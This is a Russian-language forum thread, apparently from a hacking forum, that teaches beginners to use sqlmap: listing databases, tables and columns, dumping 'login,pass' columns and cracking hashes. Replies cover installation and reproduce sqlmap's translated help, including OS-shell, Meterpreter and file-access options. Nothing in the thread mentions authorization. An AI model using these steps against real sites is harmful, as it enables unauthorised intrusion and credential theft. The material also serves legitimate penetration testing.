Sqlmap для начинающих

P

Pablo Emilio


Разбор команд из видео:
sqlmap -u

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

--dbs
-u это URL
--dbs база данных, покажет список всех БД

Так же запрос можно было составить таким образом
sqlmap -u

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

--dbs --random-agent
--random-agent - в этом случае вместо дефолтного юзерагента будет случайным образом выбран правдоподобный


Далее смотрим какие таблицы и колонки доступны:
sqlmap -u

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

-D имя таблицы --table
-D имя таблицы --table отображения списка таблиц внутри базы данных



sqlmap -u

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

-D имя таблицы --columns -T name
--columns -T name перечисляем столбцы таблицы базы данных


sqlmap -u

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

-D имя таблицы --columns -T name -C 'login,pass' --dump
-C’login,pass’ указываем колонки таблиц, через запятую, если их несколько


Так же если пароль будет зашифрован sqlmap предложит перебрать его по словарю, можно выбрать дефолтный, а можно указать путь к своему файлу.

Утилита обладает огромным функционалом, я затронул только базовые функции, кому будет интересно может углубиться самостоятельно в изучение и почитать документацию:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

 
Последнее редактирование модератором:
Полезная информация для "новичков". Вот бы ещё что то подобное по "поиску" подобных свйтов.
 
A

Alex_Luter

Где бы скачать этот sqlmap? Киньте ссылку.
 
T

Tirin

Где бы скачать этот sqlmap? Киньте ссылку.
Или если не хочешь ставить kali linux как предложил коллега выше, можешь установить SQLmap на Windows:
1 Качаешь и устанавливаешь python 2.7 с оф. сайта питона

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


2 Качаешь SQLmap

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


3 Распаковываешь скачанный архив с SQLmap-ом в корень диска C и содержимое папки переименуй как тебе удобно например в sqlmap,
должно получится например так C:\sqlmap
4 Запускаешь командную строку и в ней переходишь в папку с SQLmap-ом команда cd \sqlmap (должно получиться так C:\sqlmap>_ )
Чтобы SQLmap запускался в виндовс во все команды нужно добавлять расширение файла .py
первая команда из первого поста получится такая sqlmap.py -u

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

--dbs
у тебя в командной строке это будет выглядеть так:

C:\sqlmap>sqlmap.py -u

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

--dbs

Всё дальше фигачешь как показано в описании.
 
B

bronson

Приветствую! Скажите пожалуйста, а sqlmap имеет возможность сначала залогиниться под легитимным логином и паролем на сайте/форуме/интернет-магазине, а потом уже начать поиск уязвимых запросов?
Не пинайте пожалуйста за вопрос. Спасибо. Статья очень полезная.
 
T

Tirin

Скажите пожалуйста, а sqlmap имеет возможность сначала залогиниться под легитимным логином и паролем на сайте/форуме/интернет-магазине, а потом уже начать поиск уязвимых запросов?
Да можно так сделать, вот подробная статья по твоему вопросу

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

 
T

Tirin

А так же
Код:
Опции:
  -h, --help            Показать базовую справку и выйте
  -hh                   Показать продвинутую справку и выйти
  --version             Показать номер версии программы и выйти
  -v VERBOSE            Уровень вербальности: 0-6 (по умолчанию 1)
 
  Цель:
    По крайней мере одна из этих опций должна быть указана, чтобы задать цель(и)
 
    -d DIRECT           Строка подключения для прямого соединения с базой данных
    -u URL, --url=URL   Целевой URL (например, "http://www.site.com/vuln.php?id=1")
    -l LOGFILE          Парсить цель(и) из файлов логов Burp или WebScarab
    -x SITEMAPURL       Парсить цель(и) из удалённого файла sitemap(.xml)
    -m BULKFILE         Сканировать множество целей, заданных в текстовом файле
    -r REQUESTFILE      Загрузить HTTP запросы из файла
    -g GOOGLEDORK       Обработать результаты дорков Google как целевых URL
    -c CONFIGFILE       Загрузить опции из конфигурационного файла INI
 
  Запросы:
    Эти опции могут использоваться для определения как подключиться к целевому URL
 
    --method=МЕТОД        Принудительно использовать заданный HTTP метод (например, PUT)
    --data=ДАННЫЕ         Строка данных для отправки через POST
    --param-del=РАЗД_ПАР  Символ, используемый для разделения величин параметров
    --cookie=КУКИ         Значение заголовка HTTP куки
    --cookie-del=РАЗДЕЛИТЕЛЬ_КУКИ  Символ, используемый для разделения величин куки
    --load-cookies=ФАЙЛ_ДЛЯ_ЗАГРУЗКИ  Файл, содержащий куки в формате Netscape/wget
    --drop-set-cookie     Игнорировать заголовок Set-Cookie из ответа
    --user-agent=AGENT    Значение заголовка HTTP User-Agent
    --random-agent        Использовать случайно выбранное значение заголовка HTTP User-Agent
    --host=ХОСТ           Значение заголовка хоста HTTP
    --referer=РЕФЕРЕР     Значение заголовка HTTP Referer
    -H ЗАГОЛОВОК, --header  Дополнительный заголовок (к примеру, "X-Forwarded-For: 127.0.0.1")
    --headers=ЗАГОЛОВКИ   Дополнительные заголовки (к примеру, "Accept-Language: fr\nETag: 123")
    --auth-type=ТИП_АУТ  HTTP тип аутентификации (Basic, Digest, NTLM или PKI)
    --auth-cred=ДАННЫЕ_АУТ  учётные данные HTTP аутентификации (имя:пароль)
    --auth-file=ФАЙЛ_АУТ  файл HTTP аутентификации PEM сертификат/частный ключ
    --ignore-401        Игнорировать ошибку HTTP 401 (Unauthorized) (Неавторизован)
    --ignore-proxy      Игнорировать дефолтные системные настройки прокси
    --ignore-redirects  Игнорировать попытки редиректа
    --ignore-timeouts   Игнорировать таймауты соединений
    --proxy=ПРОКСИ         Использовать прокси для подключения к целевому URL
    --proxy-cred=УЧЁТКА_ПРОКСИ  Учётные данные аутентификации прокси (имя:пароль)
    --proxy-file=ФАЙЛ_ПРОКСИ  Загрузить список прокси из файла
    --tor                  Использовать анонимную сеть Tor
    --tor-port=TORPORT     Установить порт прокси Tor отличный от дефолтного
    --tor-type=TORTYPE     Установить тип прокси Tor (HTTP (по умолчанию), SOCKS4 или SOCKS5)
    --check-tor            Проверить, используется ли Tor должным образом
    --delay=ЗАДЕРЖКА       Задержка в секундах между каждым HTTP запросом
    --timeout=ТАЙМАУТ      Секунды для ожидания перед таймаутом соединения (по умолчанию 30)
    --retries=ПОПЫТКИ      Попытки при таймаутах соединения (по умолчанию 3)
    --randomize=ПАРАМЕТРЫ  Случайно менять значения данного параметра(ов)
    --safe-url=БЕЗОПАСНЫЙ_EURL  URL адрес для частого посещения во время тестирования
    --safe-post=POST  Данные POST для отправки на безопасный URL
    --safe-req=БЕЗОПАСНЫЙ_ФАЙЛ  Load safe HTTP request from a file
    --safe-freq=КОЛИЧЕСТВО  Тестовые запросы между двумя визитами на заданный безопасный URL
    --skip-urlencode       Пропустить URL кодирование данных для запросов
    --csrf-token=CSR..     Параметр используемый для удержания токена anti-CSRF
    --csrf-url=CSRFURL     URL адрес для посещения для извлечения токена anti-CSRF
    --force-ssl            Принудительное использование SSL/HTTPS
    --hpp                  Использовать метод загрязнения параметра HTTP
    --eval=EVALCODE        Выполнить данный код Python перед запросом (например,
                           "import hashlib;id2=hashlib.md5(id).hexdigest()")
 
  Оптимизация:
    Эти опции могут использовать для оптимизации производительности sqlmap
 
    -o                  Отключить все переключатели оптимизации
    --predict-output    Прогнозировать общий вывод запросов
    --keep-alive        Использовать постоянные соединения HTTP(s)
    --null-connection   Получить длину страницу без фактического тела ответа HTTP
    --threads=ПОТОКИ    Максимальное количество одновременных HTTP(s) запросов (по умолчанию 1)
 
  Инъекция:
    Эти опции могут использоваться для определения, какой параметр тестировать,
    обеспечивать пользовательскую инъекционную нагрузку и дополнительные скрипты обфускации
 
    -p TESTPARAMETER    Тестируемый параметр(ы)
    --skip=SKIP         Пропустить тестирования данного параметра(ов)
    --skip-static       Пропустить тестирование параметров, которые не кажутся динамическими
    --param-exclude=..  Регулярное выражение для исключения параметров из тестирования (например, "ses")
    --dbms=DBMS         Принудительно указать СУБД
    --dbms-cred=DBMS..  Данные аутентификации СУБД (пользователь:пароль)
    --os=OS             Принудительно указать операционную систему СУБД
    --invalid-bignum    Использовать большие числа для недействительных значений
    --invalid-logical   Использовать логические операции для недействительных значений
    --invalid-string    Использовать случайные строки для недействительных значений
    --no-cast           Отключить механизм отбора полезной нагрузки
    --no-escape         Отключить механизм экранирования строк
    --prefix=PREFIX     Предваряющая строка инъекционного запроса
    --suffix=SUFFIX     Завершающая строка инъекционного запроса
    --tamper=TAMPER     Использовать данный скрипт(ы) для обфускации инъекционных данных
 
  Выявление:
    Эти опции можно использовать для настройки фазы выявления
 
    --level=УРОВЕНЬ       Уровень выполнения тестирования (1-5, по умолчанию 1)
    --risk=РИСК           Риск выполняемого тестирования (1-3, по умолчанию 1)
    --string=СТРОКА       Строка, когда запрос выполнен в True (Истина)
    --not-string=НЕ_ИСТИНА  Строка, когда запрос выполнен в False (Ложь)
    --regexp=РЕГУЛЯРНОЕ_ВЫРАЖЕНИЕ     Регулярное выражение, когда запрос выполнен в True (Истина)
    --code=КОД            HTTP код, когда запрос выполнен в True (Истина)
    --text-only           Сравнить страницы основываясь только на текстовом содержимом
    --titles              Сравнить страницы основываясь только на их заголовках
 
  Техники:
    Эти опции можно использовать для поднастройки тестирования отдельных техник SQL инъекции
 
    --technique=ТЕХНИКА    Техники SQL инъекций для использования (по умолчанию "BEUSTQ")
    --time-sec=TIMESEC     Секунды для задержки ответа СУБД (по умолчанию 5)
    --union-cols=UCOLS     Диапазон колонок для тестирования с запросами UNION SQL инъекций
    --union-char=UCHAR     Символ для использования при брутфорсинге количества колонок
    --union-from=UFROM     Таблица для использования в FROM части UNION запроса SQL инъекции
    --dns-domain=ДОМЕН     Доменное имя, используемое для эксфильтрационной атаки DNS
    --second-order=СТРОКА  В результате по URL ищется ответ второго порядка
 
  Отпечатки:
    -f, --fingerprint   Выполняет обширную сверку версии СУБД
 
  Перечисления:
    Эти опции могут использоваться для перечисления информации
    системы управления базами данных, структуры содержащихся в
    таблицах данных. Более того, вы можете запустить ваши собственные
    SQL выражения
 
    -a, --all           Получить всё
    -b, --banner        Получить банер СУБД
    --current-user      Получить текущего пользователя СУБД
    --current-db        Получить текущую базу данных СУБД
    --hostname          Получить имя хоста сервера СУБД
    --is-dba            Определить, является ли текущий пользователь администратором СУБД
    --users             Перечислить пользователей СУБД
    --passwords         Перечислить хеши паролей пользователей СУБД
    --privileges        Перечислить пользовательские привилегии СУБД
    --roles             Перечислить пользовательские роли СУБД
    --dbs               Перечислить базы данных СУБД
    --tables            Перечислить таблицы базы данных СУБД
    --columns           Перечислить колонки таблицы СУБД
    --schema            Перечислить схему СУБД
    --count             Перечислить количество записей для таблицы(таблиц)
    --dump              Сдампить записи таблицы базы данных СУБД
    --dump-all          Сдампить все записи таблиц базы данных СУБД
    --search            Поиск колонки(ок), таблиц(ы) и/или имени(имён) базы данных
    --comments          Получить комментарии СУБД
    -D БД               БД СУБД для перечисления
    -T ТБЛ              Таблица(ы) БД СУБД для перечисления
    -C КОЛ              Колонка(и) таблицы БД СУБД для перечисления
    -X ПРОПУСТИТЬКОЛ    Колонка(и) БД СУБД для не перечисления
    -U ПОЛЬЗОВАТЕЛЬ     Пользователи СУБД для перечисления
    --exclude-sysdbs    Пробустить системные БД СУБД при перечислении таблиц
    --pivot-column=P..  Имя стержневой (Pivot) колонки
    --where=DUMPWHERE   Использовать условие WHERE при дампинге таблиц
    --start=LIMITSTART  Первая выходная запись запроса для получения
    --stop=LIMITSTOP    Последняя выходная запись запроса для получения
    --first=FIRSTCHAR   Первый символ выходного слова запроса для получения
    --last=LASTCHAR     Последний символ выходного слова запроса для получения
    --sql-query=QUERY   SQL выражение для исполнения
    --sql-shell         Приглашение интерактивного SQL шелла
    --sql-file=SQLFILE  Выполнить SQL выражение из данного файла(ов)
 
  Брут-форс:
    Эти опции могут использоваться для записи проверок брут-форсом
 
    --common-tables     Проверить наличие распространённых таблиц
    --common-columns    Проверить наличие распространённых колонок
 
  Инъекция заданных пользователем функций:
    Эти опции могут быть использованы для создания определённых пользователем функций
 
    --udf-inject        Вставка предопределённых пользователем функций
    --shared-lib=SHLIB  Локальный путь до общей библиотеки
 
  Доступ к файловой системе:
    Эти опции могут быть использованы для доступа к файловой системе СУБД
 
    --file-read=RFILE   Прочитать файл из файловой системы СУБД
    --file-write=WFILE  Записать локальный файл в файловую систему СУБД
    --file-dest=DFILE   Абсолютный путь для записи файла в СУБД
 
  Доступ к оперативной системе:
    Эти опции могут быть использованы для получения доступа к ОС СУБД
 
    --os-cmd=OSCMD      Выполнить команду ОС
    --os-shell          Приглашение интерактивного шелла ОС
    --os-pwn            Прриглашение для внеполосного шелла, Meterpreter или VNC
    --os-smbrelay       Однокликовое приглашение для внеполосного шелла, Meterpreter или VNC
    --os-bof            Эксплуатация переполнения буфера хранимой процедуры
    --priv-esc          Повышение пользовательских привилегий процесса БД
    --msf-path=MSFPATH  Локальный путь где установлен Metasploit Framework
    --tmp-path=TMPPATH  Удалённый абсолютный путь директории временных файлов
 
  Доступ к регистру Windows:
    Эти опции могут использоваться к доступу к регистру Windows СУБД
 
    --reg-read          Прочитать значение ключа регистра Windows
    --reg-add           Записать значение ключа регистра Windows
    --reg-del           Удалить значение ключа регистра Windows
    --reg-key=REGKEY    Ключ регистра Windows
    --reg-value=REGVAL  Значение ключа регистра Windows
    --reg-data=REGDATA  Данные значения ключа регистра Windows
    --reg-type=REGTYPE  Тип значения ключа регистра Windows
 
  Общие:
    Эти опции могут быть использованы для установки общих рабочих параметров
 
    -s SESSIONFILE      Загрузить сессию из сохранённого файла (.sqlite)
    -t TRAFFICFILE      Записать весь HTTP трафик в текстовый файл
    --batch             Никогда не спрашивать пользовательского ввода, использовать поведение по умолчанию
    --binary-fields=..  Поля результатов имеют двоичные значения (например, "digest")
    --charset=CHARSET   Принудительная кодировка символов, используемых для получения данных
    --crawl=CRAWLDEPTH  Ползать по веб-сайту начиная с заданного URL
    --crawl-exclude=РЕГВЫРАЖЕНИЕ  Регулярное выражение для исключения страниц для ползания (например, "logout")
    --csv-del=CSVDEL    Символ разделителя, используемый в выводе CSV (по умолчанию ",")
    --dump-format=ДАМПФОРМАТ  Формат сдампленных данных (CSV (по умолчанию), HTML или SQLITE)
    --eta               Отобразить для каждого вывода приблизительное время прибытия
    --flush-session     Стереть сессионные файлы для текущей цели
    --forms             Парсить и тестировать формы на целевой URL
    --fresh-queries     Игнорировать результаты запросов, сохранённые в сессионном файле
    --hex               Использовать шестнадцатеричную функцию(ии) СУБД для получения данных
    --output-dir=OUT..  Пользовательский путь директории вывода
    --parse-errors      Парсить и отображать сообщения ошибок СУБД из ответов
    --save=SAVECONFIG   Сохранить опции в конфигурационный INI файл
    --scope=SCOPE       Регулярное выражение для фильтрации целей из лога proxy
    --test-filter=TE..  Выбрать тесты по полезной нагрузке и/или названиям (например, ROW)
    --test-skip=TEST..  Пропустить тесты по полезной нагрузке и/или названиям (например, BENCHMARK)
    --update            Обновить sqlmap
 
  Разное:
    -z MNEMONICS        Использовать короткие мнемоники (например, "flu,bat,ban,tec=EU")
    --alert=ALERT       Запустить команду(ы) ОС, когда найдена SQL инъекция
    --answers=ANSWERS   Установить ответ на вопрос (например "quit=N,follow=N")
    --beep              Сигнал на вопрос и/или когда найдена SQL инъекция
    --cleanup           Очистить СУБД от специфичных для sqlmap пользовательских функций и таблиц
    --dependencies      Проверить на отсутствующие (неосновные) зависимости sqlmap
    --disable-coloring  Отключить раскрашивание вывода в консоли
    --gpage=GOOGLEPAGE  Использовать результаты дорка Google с указанного номера страницы
    --identify-waf      Провести тщательное тестирование на WAF/IPS/IDS защиту
    --mobile            Имитировать смартфон через заголовок HTTP User-Agent
    --offline           Работать в оффлайн режиме (использовать только данные сессии)
    --purge-output      Безопасно удалить всё содержимое из директории вывода
    --skip-waf          Пропустить эвристическое обнаружение WAF/IPS/IDS защиты
    --smart             Провести тщательные тесты только если эвристика дала положительные результаты
    --sqlmap-shell      Запрос интерактивного шелла sqlmap
    --tmp-dir=TMPDIR    Локальная директория для сохранения временных файлов
    --web-root=WEBROOT  Корневая директория веб-сервера (например, "/var/www")
    --wizard            Простой интерфейс мастера для начинающих пользователей
 
V

Vitaliy2204


Разбор команд из видео:
sqlmap -u

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

--dbs
-u это URL
--dbs база данных, покажет список всех БД

Так же запрос можно было составить таким образом
sqlmap -u

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

--dbs --random-agent
--random-agent - в этом случае вместо дефолтного юзерагента будет случайным образом выбран правдоподобный


Далее смотрим какие таблицы и колонки доступны:
sqlmap -u

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

-D имя таблицы --table
-D имя таблицы --table отображения списка таблиц внутри базы данных



sqlmap -u

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

-D имя таблицы --columns -T name
--columns -T name перечисляем столбцы таблицы базы данных


sqlmap -u

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

-D имя таблицы --columns -T name -C 'login,pass' --dump
-C’login,pass’ указываем колонки таблиц, через запятую, если их несколько


Так же если пароль будет зашифрован sqlmap предложит перебрать его по словарю, можно выбрать дефолтный, а можно указать путь к своему файлу.

Утилита обладает огромным функционалом, я затронул только базовые функции, кому будет интересно может углубиться самостоятельно в изучение и почитать документацию:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

Нужна помощь после sqlmap -u

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

--dbs пишет critical host

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

 
V

Vitaliy2204

Сделайте лучше видео как найти уязвимость сайта например с Nikto
 
Похожие темы
G SQLMAP-обнаружение и эксплуатация SQL инъекции: детальное разъяснение (часть 1) Полезные статьи 0
V SqlMap GUI v.1.0.0.4 Готовый софт 2
M SqlMap GUI v.1.0.0.4 by JohnDoe [ОБНОВА] Готовый софт 4
M Как установить sqlmap на андроид. Полезные статьи 0
Support81 «Обновите Chrome для защиты» — самая опасная кнопка интернета. Новости в сети 0
Support81 Этичный хакинг? Забудьте. США готовят рои ИИ-агентов для атаки на Китай Новости в сети 0
Support81 $244000000 за шифрование. VPN-инфраструктура теперь — бесплатный банкомат для хакеров Новости в сети 0
Support81 200000 постов за год: кипрская ботоферма круглосуточно печатает дипломы для всей России Новости в сети 0
Support81 Брак программиста длится годы. Женщины-шпионы ведут «сексуальную войну» для кражи его секретов Новости в сети 0
onlydockyc Продам Файлы PDF шаблонов для подтверждения адреса проживания Все что не подошло по разделу 0
onlydockyc Могу помочь вам своим небольшим опытом. Сделаю для вас фотомонтаж, отрисовку или подобные работы в photoshop. Раздачи и сливы 0
Support81 Ваш телефон — их радар. Altamides создала глобальную систему слежки в 160 странах, невидимую для спецслужб Новости в сети 0
Support81 С виду — офис инвестиционной компании. На деле — 80 мошенников с 204 мониторами для обмана жертв Новости в сети 0
Support81 Не Таиланд, а рабство в Мьянме: как туристический рай стал перевалочной базой для похитителей россиян Новости в сети 0
Support81 ФБР заблокировало портал BreachForums, использовавшийся для вымогательства у Salesforce Новости в сети 0
Support81 Россия — цель №1 для хакеров. На страну приходится до 72% всех кибератак в СНГ. Новости в сети 0
Support81 Новая тактика «Призрачных звонков» использует Zoom и Microsoft Teams для операций C2 Новости в сети 0
wrangler65 Как стать хакером для «самых маленьких» Ч.2 Полезные статьи 0
wrangler65 Как стать хакером для «самых маленьких» Ч.1 Полезные статьи 0
Support81 Storm-2603 использует бэкдор, контролируемый DNS, для атак программ-вымогателей Warlock и LockBit Новости в сети 0
Support81 Операторы LockBit используют скрытую технику загрузки DLL для загрузки вредоносного приложения Новости в сети 0
Support81 Как война в Украине стала полигоном для наркокартелей Новости в сети 0
Support81 Вредоносное ПО Lumma для кражи информации возвращается после вмешательства правоохранительных органов Новости в сети 0
turbion0 Мошенники создали фальшивые страницы для продажи авиабилетов в Геленджик Новости в сети 0
Support81 Вирус-вымогатель Interlock использует метод FileFix для доставки вредоносного ПО Новости в сети 0
Support81 Великобритания запускает программу исследования уязвимостей для внешних экспертов Новости в сети 0
Support81 Идеальное оружие для киберпреступников: нейросети заставляют вас самих кликать на фишинговые ловушки Новости в сети 0
Support81 Легенду превратили в ловушку: имя Флибусты — теперь приманка для жертв Новости в сети 0
Support81 Шпион из ЦРУ превратил Telegram в площадку для государственной тайны Новости в сети 0
Support81 SMS для Google и Meta? Перешлём через Намибию, Чечню и швейцарский гараж Новости в сети 0
wrangler65 Katz Stealer: новая опасная малварь для кражи данных с функциями скрытности и модульности Новости в сети 0
wrangler65 Киберпартизаны атакуют: новый бэкдор Vasilek использует Telegram для управления зараженными системами Новости в сети 0
smmgoal Интересно BrownVPN – Ваш надежный VPN для конфиденциальности, безопасности и свободы Ищу работу. Предлагаю свои услуги. 0
Support81 Хватило трёх 0Day, чтобы превратить Versa Concerto в инструмент для захвата систем связи Новости в сети 0
Support81 Семь лет в тени, одна экстрадиция, и всё — финальные титры для админа BlackDB Новости в сети 0
Support81 RTX 5090: Nvidia создала монстра для взлома паролей и скромно назвала его видеокартой Новости в сети 0
Support81 Код, который должен проверять других, сам стал лазейкой для хакеров — что не так с Langflow? Новости в сети 0
Support81 Хакер взломал мессенджер для чиновников и нашёл внутри полный архив их переписок Новости в сети 0
smmgoal Esimbuy.org Откройте для себя пакеты данных Travelsim Ищу работу. Предлагаю свои услуги. 0
Chekon ✅ sms.chekons.com - ⭐ Сайт для получения SMS на реальные номера USA "Non-VoIP, безлим SMS, API" от 0.4$ за номер⭐ Ищу работу. Предлагаю свои услуги. 0
Support81 CouchDB как проходной двор: эксплойты для критической SSH-уязвимости уже гуляют по сети Новости в сети 0
Support81 JUICYJAM: государство завело аккаунт для доносов Новости в сети 0
Support81 VShell? Скорее уж VHell: новый кошмар для Linux от UNC5174 Новости в сети 0
Support81 «PIN-код на лбу безопаснее»: Perplexity AI оказался настоящей находкой для шпиона Новости в сети 0
Support81 Драйвер от Dell, библиотека от ESET: хакеры ToddyCat собрали конструктор для взлома Windows Новости в сети 0
Support81 PIN-код для свободы: новый Android-шпион категорически против своего удаления Новости в сети 0
Support81 Март стал чёрным месяцем для Coinbase: похищено 46 млн долларов Новости в сети 0
Support81 Ошибка на TOR-сайте обернулась концом сразу для трёх группировок Новости в сети 0
Support81 Из хакеров в экстремисты: почему группа подростков Com/764 стала приоритетом для ФБР Новости в сети 0
S Продам Продается платформа для торговли бинарными опционами Покупка/Продажа 0

Название темы